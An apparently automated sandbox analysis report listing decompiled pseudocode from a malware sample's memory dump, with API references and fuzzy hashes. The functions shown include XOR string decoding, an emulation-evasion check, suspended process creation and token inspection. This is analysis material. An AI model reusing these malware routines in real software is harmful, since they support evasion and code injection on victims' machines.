                                                                      control_flow_graph 379 41b9bf7-41b9c0a 380 41b9c0c 379->380 381 41b9c21-41b9c41 GetNumberFormatA 379->381 382 41b9c0f-41b9c1a 380->382 383 41b9c89-41b9c8d 381->383 384 41b9c43-41b9c47 381->384 386 41b9c4b-41b9c4d 382->386 387 41b9c1c-41b9c1f 382->387 383->383 385 41b9c8f 383->385 384->384 388 41b9c49 384->388 389 41b9c94 385->389 386->381 390 41b9c4f-41b9c53 call 41b911f 386->390 387->381 387->382 388->385 391 41b9c96-41b9c9a 389->391 393 41b9c58-41b9c60 390->393 394 41b9c69-41b9c6e 393->394 395 41b9c62-41b9c67 393->395 396 41b9c70-41b9c82 394->396 395->391 396->396 397 41b9c84-41b9c87 396->397 397->389
                                                                      C-Code - Quality: 100%
                                                                      			E041B9BF7(intOrPtr __ecx, void* __edx, intOrPtr _a4, signed int _a12) {
                                                                      				intOrPtr _v8;
                                                                      				char _v88;
                                                                      				signed int _t21;
                                                                      				struct _numberfmt* _t27;
                                                                      				intOrPtr _t28;
                                                                      				intOrPtr _t29;
                                                                      				signed int _t30;
                                                                      				signed int _t32;
                                                                      				intOrPtr _t33;
                                                                      				void* _t34;
                                                                      				void* _t36;
                                                                      				signed int _t37;
                                                                      				signed int _t38;
                                                                      				void* _t39;
                                                                      
                                                                      				_t34 = __edx;
                                                                      				_t29 = __ecx;
                                                                      				_t37 = _a12;
                                                                      				_t38 = _t37;
                                                                      				_v8 = __ecx;
                                                                      				if(_t37 >= __edx) {
                                                                      					L4:
                                                                      					_t27 = 0;
                                                                      					if(GetNumberFormatA(0xdc, 0x172, "chickenfried", 0,  &_v88, 0x22) != 0) {
                                                                      						do {
                                                                      							_t27 = _t27 + 1;
                                                                      						} while (_t27 < 0x22);
                                                                      						L14:
                                                                      						_t30 = 0x41d107e;
                                                                      						L15:
                                                                      						return _t30;
                                                                      					} else {
                                                                      						goto L5;
                                                                      					}
                                                                      					do {
                                                                      						L5:
                                                                      						_t27 = _t27 + 1;
                                                                      					} while (_t27 < 0x14);
                                                                      					goto L14;
                                                                      				}
                                                                      				_t28 = _a4;
                                                                      				while( *((intOrPtr*)((_t38 & 0x0000007f) + _t28)) !=  *((intOrPtr*)(_t38 + _t29))) {
                                                                      					_t38 = _t38 + 1;
                                                                      					if(_t38 < _t34) {
                                                                      						continue;
                                                                      					}
                                                                      					goto L4;
                                                                      				}
                                                                      				_t39 = _t38 - _t37;
                                                                      				if(_t39 == 0) {
                                                                      					goto L4;
                                                                      				}
                                                                      				_t21 = E041B911F(_t39 + 1); // executed
                                                                      				_t32 = _t21;
                                                                      				_a12 = _t32;
                                                                      				if(_t32 != 0) {
                                                                      					_t33 = _v8;
                                                                      					_t36 = _t32 - _t37;
                                                                      					do {
                                                                      						 *(_t36 + _t37) =  *((_t37 & 0x0000007f) + _t28) ^  *(_t37 + _t33);
                                                                      						_t37 = _t37 + 1;
                                                                      						_t39 = _t39 - 1;
                                                                      					} while (_t39 != 0);
                                                                      					_t30 = _a12;
                                                                      					goto L15;
                                                                      				}
                                                                      				return 0x41d107e;
                                                                      			}


















                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.508283820.00000000041B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041B0000, based on PE: true
                                                                      • Associated: 00000012.00000002.508276267.00000000041B0000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000012.00000002.508303853.00000000041CA000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000012.00000002.508313561.00000000041CF000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000012.00000002.508320405.00000000041D2000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_18_2_41b0000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: FormatNumber
                                                                      • String ID: chickenfried
                                                                      • API String ID: 481257995-586419266
                                                                      • Opcode ID: 6bf835e311f95c403f06d40a91c91af8ef103c927e37cec8e2a2613c98f215e2
                                                                      • Instruction ID: e8cd0e75a0ef8a21227eed4e34db13a289cb803dea3acbb360d85043690366bc
                                                                      • Opcode Fuzzy Hash: 6bf835e311f95c403f06d40a91c91af8ef103c927e37cec8e2a2613c98f215e2
                                                                      • Instruction Fuzzy Hash: 60117DF17142556FD7178F6C88D05FA7BEA9B8521472104A9E7D6AB341D720FC0383D0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      control_flow_graph 398 41bca94-41bcae3 call 41b92a2 * 2 CreateProcessW
                                                                      C-Code - Quality: 79%
                                                                      			E041BCA94(WCHAR* __ecx, struct _PROCESS_INFORMATION* __edx) {
                                                                      				struct _STARTUPINFOW _v72;
                                                                      				signed int _t11;
                                                                      
                                                                      				E041B92A2(__edx, 0, 0x10);
                                                                      				E041B92A2( &_v72, 0, 0x44);
                                                                      				_v72.cb = 0x44;
                                                                      				_t11 = CreateProcessW(0, __ecx, 0, 0, 0, 4, 0, 0,  &_v72, __edx);
                                                                      				asm("sbb eax, eax");
                                                                      				return  ~( ~_t11) - 1;
                                                                      			}






                                                                      APIs
                                                                        • Part of subcall function 041B92A2: memset.MSVCRT ref: 041B92B4
                                                                      • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?,?,?,?,?,?,00000000), ref: 041BCAD6
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.508283820.00000000041B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041B0000, based on PE: true
                                                                      • Associated: 00000012.00000002.508276267.00000000041B0000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000012.00000002.508303853.00000000041CA000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000012.00000002.508313561.00000000041CF000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000012.00000002.508320405.00000000041D2000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_18_2_41b0000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: CreateProcessmemset
                                                                      • String ID: D
                                                                      • API String ID: 2296119082-2746444292
                                                                      • Opcode ID: 1834c56068b8e9d375cf5ed20af35749657648541936ed350293a01df60cc832
                                                                      • Instruction ID: 315d137bb1c582bbdbda694f7fef7a4c585920345ea1bc20d12564086e27e263
                                                                      • Opcode Fuzzy Hash: 1834c56068b8e9d375cf5ed20af35749657648541936ed350293a01df60cc832
                                                                      • Instruction Fuzzy Hash: 9CF030F2A512083EF620E666CC0AFBF3AACDB85714F504065BB05EB1C0E6A4AD0582A5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 77%
                                                                      			E041B1494(void* __edi, void* __fp0) {
                                                                      				char _v8;
                                                                      				void* __ecx;
                                                                      				char _t19;
                                                                      				intOrPtr _t22;
                                                                      				intOrPtr _t24;
                                                                      				intOrPtr _t25;
                                                                      				signed int _t27;
                                                                      				signed int _t29;
                                                                      				intOrPtr _t30;
                                                                      				signed int _t31;
                                                                      				intOrPtr _t34;
                                                                      				intOrPtr* _t36;
                                                                      				void* _t37;
                                                                      				intOrPtr _t40;
                                                                      				void* _t50;
                                                                      				intOrPtr _t52;
                                                                      				void* _t56;
                                                                      				void* _t58;
                                                                      				signed int _t60;
                                                                      				char _t62;
                                                                      
                                                                      				_t68 = __fp0;
                                                                      				E041B15D4();
                                                                      				_t19 = E041B911F(0x20);
                                                                      				_v8 = _t19;
                                                                      				_t54 = 0x1f;
                                                                      				do {
                                                                      					_t2 = _t54 + 0x63; // 0x82
                                                                      					 *((char*)(_t54 + _t19)) = _t2;
                                                                      					_t54 = _t54 - 1;
                                                                      				} while (_t54 >= 0);
                                                                      				E041B913B( &_v8, 0);
                                                                      				_t22 = E041BBB4D(_t54, __fp0); // executed
                                                                      				 *0x41d0fd8 = _t22;
                                                                      				if(_t22 != 0) {
                                                                      					E041C4257( *((intOrPtr*)(_t22 + 0x224)));
                                                                      					_t24 =  *0x41d0fd8; // 0x439fc50
                                                                      					_t60 = 1;
                                                                      					_t50 = _t58;
                                                                      					__eflags =  *((intOrPtr*)(_t24 + 0x101c)) - 1;
                                                                      					if( *((intOrPtr*)(_t24 + 0x101c)) == 1) {
                                                                      						__imp__CoInitializeEx(0, 6, __edi);
                                                                      						_t30 =  *0x41d0fd8; // 0x439fc50
                                                                      						_push(0);
                                                                      						_push(0x41cd9b8);
                                                                      						_t31 = _t30 + 0x228;
                                                                      						__eflags = _t31;
                                                                      						_push(_t31);
                                                                      						_t56 = E041B9924(0x41cd9b8);
                                                                      						_t62 = E041B16EC(0x41cd9b8, 0x2a);
                                                                      						_v8 = _t62;
                                                                      						while(1) {
                                                                      							_t52 =  *0x41d0fd8; // 0x439fc50
                                                                      							_t34 =  *0x41d0fc0; // 0x439fa38
                                                                      							_t36 =  *0x41d0fb4; // 0x439fc18
                                                                      							_t37 =  *_t36( *((intOrPtr*)(_t34 + 0x54))(_t62, _t52 + 0x1644, _t56, 0, 0));
                                                                      							__eflags = _t37 - 5;
                                                                      							if(_t37 != 5) {
                                                                      								break;
                                                                      							}
                                                                      							Sleep(0x7d0);
                                                                      						}
                                                                      						E041B9D66( &_v8);
                                                                      						_t40 =  *0x41d0fa0; // 0x439f8a0
                                                                      						_pop(_t50);
                                                                      						 *((intOrPtr*)(_t40 + 0xec))(0);
                                                                      						_t24 =  *0x41d0fd8; // 0x439fc50
                                                                      						_t60 = 1;
                                                                      						__eflags = 1;
                                                                      					}
                                                                      					__eflags =  *(_t24 + 0x1898) & 0x00010082;
                                                                      					if(( *(_t24 + 0x1898) & 0x00010082) != 0) {
                                                                      						L13:
                                                                      						 *((intOrPtr*)(_t24 + 0xa4)) = _t60;
                                                                      						_t25 =  *0x41d0fd8; // 0x439fc50
                                                                      						__eflags =  *((intOrPtr*)(_t25 + 0x214)) - 3;
                                                                      						if(__eflags != 0) {
                                                                      							goto L15;
                                                                      						} else {
                                                                      							goto L14;
                                                                      						}
                                                                      					} else {
                                                                      						_t14 = _t24 + 0x224; // 0x41b0000
                                                                      						_t54 =  *_t14;
                                                                      						_t29 = E041BA664( *_t14); // executed
                                                                      						__eflags = _t29;
                                                                      						_t24 =  *0x41d0fd8; // 0x439fc50
                                                                      						_t50 = _t50;
                                                                      						if(_t29 == 0) {
                                                                      							goto L13;
                                                                      						} else {
                                                                      							__eflags =  *((intOrPtr*)(_t24 + 0x214)) - 3;
                                                                      							if( *((intOrPtr*)(_t24 + 0x214)) == 3) {
                                                                      								L14:
                                                                      								__eflags = E041B29DD();
                                                                      								if(__eflags < 0) {
                                                                      									L15:
                                                                      									E041B12F8(_t50, _t54, __eflags, _t68);
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      					}
                                                                      					_t27 = 0;
                                                                      					__eflags = 0;
                                                                      				} else {
                                                                      					_t27 = _t22 + 1;
                                                                      				}
                                                                      				return _t27;
                                                                      			}


                                                                      APIs
                                                                      • CoInitializeEx.OLE32(00000000,00000006,?,?,?,?,?,041B1005), ref: 041B14FE
                                                                      • Sleep.KERNEL32(000007D0), ref: 041B1558
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.508283820.00000000041B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041B0000, based on PE: true
                                                                      • Associated: 00000012.00000002.508276267.00000000041B0000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000012.00000002.508303853.00000000041CA000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000012.00000002.508313561.00000000041CF000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000012.00000002.508320405.00000000041D2000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_18_2_41b0000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeSleep
                                                                      • String ID:
                                                                      • API String ID: 4203272843-0
                                                                      • Opcode ID: 595e53b1b8a73fb479ad6d7f3c3c414799ffcc1e55ae6035ef2a25cd732f5405
                                                                      • Instruction ID: 4a792ca9b1dcd05a85fe6d197b27483f0a981902e680d5d6b2c0cd70753b6f8c
                                                                      • Opcode Fuzzy Hash: 595e53b1b8a73fb479ad6d7f3c3c414799ffcc1e55ae6035ef2a25cd732f5405
                                                                      • Instruction Fuzzy Hash: AD31C6B1601200BFE714EF65DDD8EE67BE8EB0A398F1684A5F54297140D774BD8187E0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 52%
                                                                      			E041B9491(void* __edx, intOrPtr _a4) {
                                                                      				char _v8;
                                                                      				void* __ecx;
                                                                      				char _t5;
                                                                      				struct HINSTANCE__* _t7;
                                                                      				void* _t11;
                                                                      				void* _t13;
                                                                      				void* _t15;
                                                                      				void* _t23;
                                                                      				void* _t26;
                                                                      
                                                                      				_push(_t15);
                                                                      				_t23 = __edx;
                                                                      				_t13 = _t15;
                                                                      				_t5 = E041B90CA(_t15, _a4);
                                                                      				_t26 = 0;
                                                                      				_v8 = _t5;
                                                                      				_push(_t5);
                                                                      				if(_a4 != 0x26e) {
                                                                      					_t7 = LoadLibraryA(); // executed
                                                                      				} else {
                                                                      					_t7 = GetModuleHandleA();
                                                                      				}
                                                                      				if(_t7 != 0) {
                                                                      					_t11 = E041B9446(_t13, _t23, _t7); // executed
                                                                      					_t26 = _t11;
                                                                      				}
                                                                      				E041B9D4C( &_v8);
                                                                      				return _t26;
                                                                      			}


                                                                      APIs
                                                                      • GetModuleHandleA.KERNEL32(00000000,?,?,?,041CD870,?,041B15E8,0000026E,041B149D,?,?,041B1005), ref: 041B94B4
                                                                      • LoadLibraryA.KERNELBASE(00000000,?,?,?,041CD870,?,041B15E8,0000026E,041B149D,?,?,041B1005), ref: 041B94C1
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.508283820.00000000041B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041B0000, based on PE: true
                                                                      • Associated: 00000012.00000002.508276267.00000000041B0000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000012.00000002.508303853.00000000041CA000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000012.00000002.508313561.00000000041CF000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000012.00000002.508320405.00000000041D2000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_18_2_41b0000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: HandleLibraryLoadModule
                                                                      • String ID:
                                                                      • API String ID: 4133054770-0
                                                                      • Opcode ID: d7ae43458d3cf51e03a29db98044d4aa7d6bca013057ea03b996e43fe9055bf8
                                                                      • Instruction ID: 835b73e2437b3a5135ffad38189f9a6043442922e00491f4196493066fb9cb0a
                                                                      • Opcode Fuzzy Hash: d7ae43458d3cf51e03a29db98044d4aa7d6bca013057ea03b996e43fe9055bf8
                                                                      • Instruction Fuzzy Hash: 42F02EB2714214AFDB145F6AE8C48CF7BECDF442A4710402AF545C7240DF70EC4186D0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E041B1000() {
                                                                      				void* _t4;
                                                                      				void* _t5;
                                                                      
                                                                      				E041B1494(_t4, _t5);
                                                                      				ExitProcess(0);
                                                                      			}

                                                                      0x041b1000
                                                                      0x041b100c

                                                                      APIs
                                                                      • ExitProcess.KERNEL32(00000000), ref: 041B100C
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.508283820.00000000041B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041B0000, based on PE: true
                                                                      • Associated: 00000012.00000002.508276267.00000000041B0000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000012.00000002.508303853.00000000041CA000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000012.00000002.508313561.00000000041CF000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000012.00000002.508320405.00000000041D2000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_18_2_41b0000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: ExitProcess
                                                                      • String ID:
                                                                      • API String ID: 621844428-0
                                                                      • Opcode ID: 99b9329cdac05f378602205d560317d893431fe8356453e7186f978cab65b3b1
                                                                      • Instruction ID: 5622e4689e9e74f96103f34361409b940186c2a116cb1afb45b9c685d67c0d4e
                                                                      • Opcode Fuzzy Hash: 99b9329cdac05f378602205d560317d893431fe8356453e7186f978cab65b3b1
                                                                      • Instruction Fuzzy Hash: 8FB012702020409FEB009B70D448FAD37D0EB0C346F4A8CA0F145CE045DB205440C710
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 47%
                                                                      			E041BDC83(void* __ecx, void* __esi) {
                                                                      				intOrPtr* _v8;
                                                                      				char _v12;
                                                                      				void* _v16;
                                                                      				char _v20;
                                                                      				char _v24;
                                                                      				short _v28;
                                                                      				char _v32;
                                                                      				void* _t20;
                                                                      				intOrPtr* _t21;
                                                                      				intOrPtr _t29;
                                                                      				intOrPtr _t31;
                                                                      				intOrPtr* _t33;
                                                                      				intOrPtr _t34;
                                                                      				char _t37;
                                                                      				union _TOKEN_INFORMATION_CLASS _t44;
                                                                      				char _t45;
                                                                      				intOrPtr* _t48;
                                                                      
                                                                      				_t37 = 0;
                                                                      				_v28 = 0x500;
                                                                      				_t45 = 0;
                                                                      				_v32 = 0;
                                                                      				_t20 = E041BDB58(__ecx);
                                                                      				_v16 = _t20;
                                                                      				if(_t20 != 0) {
                                                                      					_push( &_v24);
                                                                      					_t44 = 2;
                                                                      					_t21 = E041BDBAF(_t44); // executed
                                                                      					_t48 = _t21;
                                                                      					_v20 = _t48;
                                                                      					if(_t48 == 0) {
                                                                      						L10:
                                                                      						FindCloseChangeNotification(_v16);
                                                                      						if(_t48 != 0) {
                                                                      							E041B913B( &_v20, _t37);
                                                                      						}
                                                                      						return _t45;
                                                                      					}
                                                                      					_push( &_v12);
                                                                      					_push(0);
                                                                      					_push(0);
                                                                      					_push(0);
                                                                      					_push(0);
                                                                      					_push(0);
                                                                      					_push(0);
                                                                      					_push(0x220);
                                                                      					_push(0x20);
                                                                      					_push(2);
                                                                      					_push( &_v32);
                                                                      					_t29 =  *0x41d0fc8; // 0x439fb00
                                                                      					if( *((intOrPtr*)(_t29 + 0xc))() == 0) {
                                                                      						goto L10;
                                                                      					}
                                                                      					if( *_t48 <= 0) {
                                                                      						L9:
                                                                      						_t31 =  *0x41d0fc8; // 0x439fb00
                                                                      						 *((intOrPtr*)(_t31 + 0x10))(_v12);
                                                                      						_t37 = 0;
                                                                      						goto L10;
                                                                      					}
                                                                      					_t9 = _t48 + 4; // 0x4
                                                                      					_t33 = _t9;
                                                                      					_v8 = _t33;
                                                                      					while(1) {
                                                                      						_push(_v12);
                                                                      						_push( *_t33);
                                                                      						_t34 =  *0x41d0fc8; // 0x439fb00
                                                                      						if( *((intOrPtr*)(_t34 + 0x68))() != 0) {
                                                                      							break;
                                                                      						}
                                                                      						_t37 = _t37 + 1;
                                                                      						_t33 = _v8 + 8;
                                                                      						_v8 = _t33;
                                                                      						if(_t37 <  *_t48) {
                                                                      							continue;
                                                                      						}
                                                                      						goto L9;
                                                                      					}
                                                                      					_t45 = 1;
                                                                      					goto L9;
                                                                      				}
                                                                      				return _t20;
                                                                      			}


                                                                      APIs
                                                                        • Part of subcall function 041BDB58: GetCurrentThread.KERNEL32 ref: 041BDB6B
                                                                        • Part of subcall function 041BDB58: OpenThreadToken.ADVAPI32(00000000,?,?,041BDC9D,00000000,041B0000), ref: 041BDB72
                                                                        • Part of subcall function 041BDB58: GetLastError.KERNEL32(?,?,041BDC9D,00000000,041B0000), ref: 041BDB79
                                                                        • Part of subcall function 041BDB58: OpenProcessToken.ADVAPI32(00000000,?,?,041BDC9D,00000000,041B0000), ref: 041BDB9E
                                                                        • Part of subcall function 041BDBAF: GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,00000000,00001644,041B0000,00000000,00000000,?,041BDC30,00000000,00000000,?,041BDC59), ref: 041BDBCA
                                                                        • Part of subcall function 041BDBAF: GetLastError.KERNEL32(?,041BDC30,00000000,00000000,?,041BDC59,00001644,?,041BBBDE), ref: 041BDBD1
                                                                      • FindCloseChangeNotification.KERNELBASE(?,00001644,00000000,041B0000), ref: 041BDD27
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.508283820.00000000041B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041B0000, based on PE: true
                                                                      • Associated: 00000012.00000002.508276267.00000000041B0000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000012.00000002.508303853.00000000041CA000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000012.00000002.508313561.00000000041CF000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000012.00000002.508320405.00000000041D2000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_18_2_41b0000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Token$ErrorLastOpenThread$ChangeCloseCurrentFindInformationNotificationProcess
                                                                      • String ID:
                                                                      • API String ID: 1806447117-0
                                                                      • Opcode ID: 65ca902ff5055b3309582c66f9fb02c8b7dcb86631bdb79639da08c15d1a12a8
                                                                      • Instruction ID: 32386cd0a3404ffb379b4eb764037773de5a595601b72e9c2c890ed51b8355d0
                                                                      • Opcode Fuzzy Hash: 65ca902ff5055b3309582c66f9fb02c8b7dcb86631bdb79639da08c15d1a12a8
                                                                      • Instruction Fuzzy Hash: BD215371A01205AFDB18DFA5E8C5EEEBBB8EF48714F604469E581E7190D730A9419B90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E041BDC33(void* __ecx) {
                                                                      				signed int _v8;
                                                                      				intOrPtr _t12;
                                                                      				void* _t13;
                                                                      				void* _t14;
                                                                      				void* _t17;
                                                                      				intOrPtr _t18;
                                                                      				void* _t23;
                                                                      
                                                                      				_v8 = _v8 & 0x00000000;
                                                                      				_t12 =  *0x41d0fc8; // 0x439fb00
                                                                      				_t13 =  *((intOrPtr*)(_t12 + 0x70))(__ecx, 8,  &_v8, __ecx);
                                                                      				if(_t13 != 0) {
                                                                      					_t14 = E041BDC1C(); // executed
                                                                      					_t23 = _t14;
                                                                      					if(_t23 != 0) {
                                                                      						FindCloseChangeNotification(_v8);
                                                                      						_t17 = _t23;
                                                                      					} else {
                                                                      						if(_v8 != _t14) {
                                                                      							_t18 =  *0x41d0fa0; // 0x439f8a0
                                                                      							 *((intOrPtr*)(_t18 + 0x34))(_v8);
                                                                      						}
                                                                      						_t17 = 0;
                                                                      					}
                                                                      					return _t17;
                                                                      				} else {
                                                                      					return _t13;
                                                                      				}
                                                                      			}











                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.508283820.00000000041B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041B0000, based on PE: true
                                                                      • Associated: 00000012.00000002.508276267.00000000041B0000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000012.00000002.508303853.00000000041CA000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000012.00000002.508313561.00000000041CF000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000012.00000002.508320405.00000000041D2000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_18_2_41b0000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: fc86cde3ffbc8d5ee8fcd4847d321be8902efc71f8feb4186231d8a414df2b50
                                                                      • Instruction ID: 019b0d6ac913e8cbad63accd23891baf28c07741ceb18a999e9705c889558e1e
                                                                      • Opcode Fuzzy Hash: fc86cde3ffbc8d5ee8fcd4847d321be8902efc71f8feb4186231d8a414df2b50
                                                                      • Instruction Fuzzy Hash: BDF09A71A02104EFCB1ADBA5E982ADE7BB8EB08349F5500A8F141E7150D774EE40EB90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E041B911F(long _a4) {
                                                                      				void* _t2;
                                                                      				void* _t3;
                                                                      
                                                                      				_t2 =  *0x41d10a4;
                                                                      				if(_t2 != 0) {
                                                                      					_t3 = RtlAllocateHeap(_t2, 8, _a4); // executed
                                                                      					return _t3;
                                                                      				} else {
                                                                      					return _t2;
                                                                      				}
                                                                      			}






                                                                      APIs
                                                                      • RtlAllocateHeap.NTDLL(?,00000008,?,?,041B9C58,?,00000144,?,041CD870), ref: 041B9133
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.508283820.00000000041B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041B0000, based on PE: true
                                                                      • Associated: 00000012.00000002.508276267.00000000041B0000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000012.00000002.508303853.00000000041CA000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000012.00000002.508313561.00000000041CF000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000012.00000002.508320405.00000000041D2000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_18_2_41b0000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: AllocateHeap
                                                                      • String ID:
                                                                      • API String ID: 1279760036-0
                                                                      • Opcode ID: 4933c88fc38c9b869654fb90b058d761e2c8e4ad8e6d66b80ff489f2d7682e38
                                                                      • Instruction ID: 409c430d32fd237d1be96c8a09f3150a679c5d412543d5efc90673a30643e5dd
                                                                      • Opcode Fuzzy Hash: 4933c88fc38c9b869654fb90b058d761e2c8e4ad8e6d66b80ff489f2d7682e38
                                                                      • Instruction Fuzzy Hash: CEC080B524030CA7DF101D95FC04FD13B5CDB04595F004040F70CC5101D735F8505690
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E041B910A() {
                                                                      				void* _t1;
                                                                      
                                                                      				_t1 = HeapCreate(0, 0x96000, 0); // executed
                                                                      				 *0x41d10a4 = _t1;
                                                                      				return _t1;
                                                                      			}





                                                                      APIs
                                                                      • HeapCreate.KERNELBASE(00000000,00096000,00000000,041B1030), ref: 041B9113
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.508283820.00000000041B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041B0000, based on PE: true
                                                                      • Associated: 00000012.00000002.508276267.00000000041B0000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000012.00000002.508303853.00000000041CA000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000012.00000002.508313561.00000000041CF000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000012.00000002.508320405.00000000041D2000.00000002.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_18_2_41b0000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: CreateHeap
                                                                      • String ID:
                                                                      • API String ID: 10892065-0
                                                                      • Opcode ID: e126d80b8c6e7549c1282c76ab23acf66a3f2306e4a4c7686b25d17f1e3ff7cd
                                                                      • Instruction ID: 2fed565fb8454128329bdcf350fc159289255a8bbf5185b27dedc32e04f5850e
                                                                      • Opcode Fuzzy Hash: e126d80b8c6e7549c1282c76ab23acf66a3f2306e4a4c7686b25d17f1e3ff7cd
                                                                      • Instruction Fuzzy Hash: 01B012B4683300AAD6101B21AD06B023D50DB40B82F140200B301DC1C0C6B914509504
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 91%
                                                                      			E041BB48B(void* __ecx, intOrPtr _a4, signed int _a8) {
                                                                      				signed int _v8;
                                                                      				intOrPtr _v12;
                                                                      				signed int _t26;
                                                                      				signed int _t28;
                                                                      				signed int* _t36;
                                                                      				signed int* _t39;
                                                                      
                                                                      				_push(__ecx);
                                                                      				_push(__ecx);
                                                                      				_t36 = _a8;
                                                                      				_t28 = _t36[1];
                                                                      				if(_t28 != 0) {
                                                                      					_t39 = _t36[2];
                                                                      					do {
                                                                      						_a8 = _a8 & 0x00000000;
                                                                      						if(_t39[2] > 0) {
                                                                      							_t31 = _t39[3];
                                                                      							_t22 = _a4 + 0x24;
                                                                      							_v12 = _a4 + 0x24;
                                                                      							_v8 = _t39[3];
                                                                      							while(E041BC30F(_t22,  *_t31) != 0) {
                                                                      								_t26 = _a8 + 1;
                                                                      								_t31 = _v8 + 4;
                                                                      								_a8 = _t26;
                                                                      								_t22 = _v12;
                                                                      								_v8 = _v8 + 4;
                                                                      								if(_t26 < _t39[2]) {
                                                                      									continue;
                                                                      								} else {
                                                                      								}
                                                                      								goto L8;
                                                                      							}
                                                                      							 *_t36 =  *_t36 |  *_t39;
                                                                      						}
                                                                      						L8:
                                                                      						_t39 =  &(_t39[4]);
                                                                      						_t28 = _t28 - 1;
                                                                      					} while (_t28 != 0);
                                                                      				}
                                                                      				Sleep(0xa);
                                                                      				return 1;
                                                                      			}










                                                                      APIs
                                                                      • Sleep.KERNELBASE(0000000A), ref: 041BB4F4
                                                                      Memory Dump Source
